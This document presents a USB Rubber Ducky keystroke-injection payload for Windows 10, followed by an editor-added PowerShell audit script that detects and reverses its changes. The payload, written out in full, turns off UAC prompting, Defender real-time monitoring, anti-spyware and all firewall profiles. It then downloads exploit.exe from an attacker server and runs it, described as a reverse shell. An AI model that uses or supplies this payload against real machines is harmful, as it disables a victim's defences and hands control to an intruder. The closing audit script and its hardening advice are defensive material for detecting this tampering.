In the name of Allah, the Most Gracious, the Most Merciful.
Description: A simple Rubber Ducky payload that disables Windows UAC, Windows Firewall, and Windows Defender.
This PoC shows how to automate turning off Windows UAC, Windows Firewall, and Windows Defender on Windows 10, and how to connect back to the attacker machine via a reverse shell within (or less than) 10 seconds using a USB HID attack.
The payload also includes a step that downloads a file from a server and executes it automatically. Note that in the PoC video the file was a reverse shell that connects back to the attacker machine when executed on the victim OS.
In general, this script can also be used for end-user security awareness or as part of a red-team scenario.
The payload is not an original one; it combines one payload with another.
Please note that this payload executes in about 10 seconds. It could be modified to run in less than 10 seconds, since the delays are set to around 1000 to 1500 ms.
REM Automate Turn-Off - Windows UAC, Windows Firewall, and Windows Defender
REM Also automate to Download the malware and connect with Reverse Shell
GUI r
DELAY 1000
REM Open the Powershell as Administrator
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 1500
ALT y
ENTER
DELAY 1000
REM Disabling the UAC
STRING Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
ENTER
DELAY 1000
REM Disabling Defender real-time monitoring (labelled "Firewall Part 1" in the original payload)
STRING Set-MpPreference -DisableRealtimeMonitoring $true
ENTER
DELAY 1000
REM Disabling the Firewall on all profiles (labelled "Firewall Part 2" in the original payload)
STRING Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
ENTER
DELAY 1000
REM Disabling the Virus and Threat Protection
STRING New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
ENTER
DELAY 1000
REM Moving into C Directory
STRING cd C:\
ENTER
REM Download the Prepared Malware
STRING $WC = New-Object System.Net.WebClient
ENTER
STRING $WC.DownloadFile("http://192.168.13.129/exploit.exe","C:\exploit.exe")
ENTER
DELAY 500
REM Execute the Downloaded Malware
STRING .\exploit.exe
ENTER
DELAY 1000
ENTER
STRING exit
ENTER
- It can be set up in less than 10 seconds (depending on the DELAY values in the script).
- This script was uploaded to one of the Arduino board series.
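The payload above changes four things a defender can check for directly: the ConsentPromptBehaviorAdmin UAC value, Defender real-time monitoring, the three firewall profiles, and the DisableAntiSpyware policy value. The following audit script is an added example from the editor, not part of the original payload or PoC. It reads each of those settings, reports any that match the post-payload state, and optionally restores them. The function name Test-UacAndDefenderTampering, the -Remediate switch, the extra EnableLUA check, and the choice of 5 as the UAC value to restore (the Windows 10 default "prompt for consent for non-Windows binaries") are assumptions of this example. It assumes an elevated PowerShell session on Windows 10 with the Defender and NetSecurity modules available.

```powershell
# Added example (editor's code, not the original payload): audit the settings the
# payload tampers with and optionally restore them. Run from an elevated prompt.
function Test-UacAndDefenderTampering {
    param(
        # Assumed switch: when set, put each tampered setting back to a safe value.
        [switch]$Remediate
    )
    $findings = @()

    # 1. UAC. The payload sets ConsentPromptBehaviorAdmin to 0 ("elevate without
    #    prompting"). EnableLUA=0 is an extra check not used by the payload.
    $uacKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $uac = Get-ItemProperty -Path $uacKey -ErrorAction SilentlyContinue
    if ($uac -and $uac.ConsentPromptBehaviorAdmin -eq 0) {
        $findings += 'UAC elevates without prompting (ConsentPromptBehaviorAdmin=0)'
        if ($Remediate) {
            # 5 is the Windows 10 default (assumption of this example).
            Set-ItemProperty -Path $uacKey -Name ConsentPromptBehaviorAdmin -Value 5
        }
    }
    if ($uac -and $uac.EnableLUA -eq 0) {
        $findings += 'UAC is disabled entirely (EnableLUA=0)'
        if ($Remediate) { Set-ItemProperty -Path $uacKey -Name EnableLUA -Value 1 }
    }

    # 2. Defender real-time monitoring (Set-MpPreference -DisableRealtimeMonitoring $true).
    $mp = Get-MpPreference -ErrorAction SilentlyContinue
    if ($mp -and $mp.DisableRealtimeMonitoring) {
        $findings += 'Defender real-time monitoring is disabled'
        if ($Remediate) { Set-MpPreference -DisableRealtimeMonitoring $false }
    }

    # 3. DisableAntiSpyware policy value written by the payload.
    $polKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
    $pol = Get-ItemProperty -Path $polKey -Name DisableAntiSpyware -ErrorAction SilentlyContinue
    if ($pol -and $pol.DisableAntiSpyware -eq 1) {
        $findings += 'Defender policy DisableAntiSpyware=1 is set'
        if ($Remediate) {
            Remove-ItemProperty -Path $polKey -Name DisableAntiSpyware -ErrorAction SilentlyContinue
        }
    }

    # 4. Firewall profiles (Set-NetFirewallProfile ... -Enabled False).
    #    Enabled is a GpoBoolean enum, so compare its string form.
    $disabledProfiles = Get-NetFirewallProfile |
        Where-Object { "$($_.Enabled)" -eq 'False' }
    foreach ($profile in $disabledProfiles) {
        $findings += "Firewall profile '$($profile.Name)' is disabled"
    }
    if ($Remediate -and $disabledProfiles) {
        Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled True
    }

    return $findings
}

# Usage: report only, then (if desired) report and restore.
$result = @(Test-UacAndDefenderTampering)
if ($result.Count -eq 0) {
    Write-Output 'No tampering indicators found.'
} else {
    $result | ForEach-Object { Write-Warning $_ }
    # Uncomment to restore the settings in the same pass:
    # Test-UacAndDefenderTampering -Remediate | Out-Null
}
```

Two caveats for anyone running this as a check. First, a payload like the one above is typed at keyboard speed, so the more useful control is preventing it: Windows 10 builds with Defender Tamper Protection turned on refuse the Set-MpPreference -DisableRealtimeMonitoring change and ignore the DisableAntiSpyware policy value, and the Defender operational event log records real-time protection being turned off as event ID 5001, which is worth forwarding to a SIEM. Second, the script only looks at the four settings the payload touches; it does not tell you whether the downloaded executable ran, so treat any finding as a trigger for a wider investigation rather than as a complete clean-up.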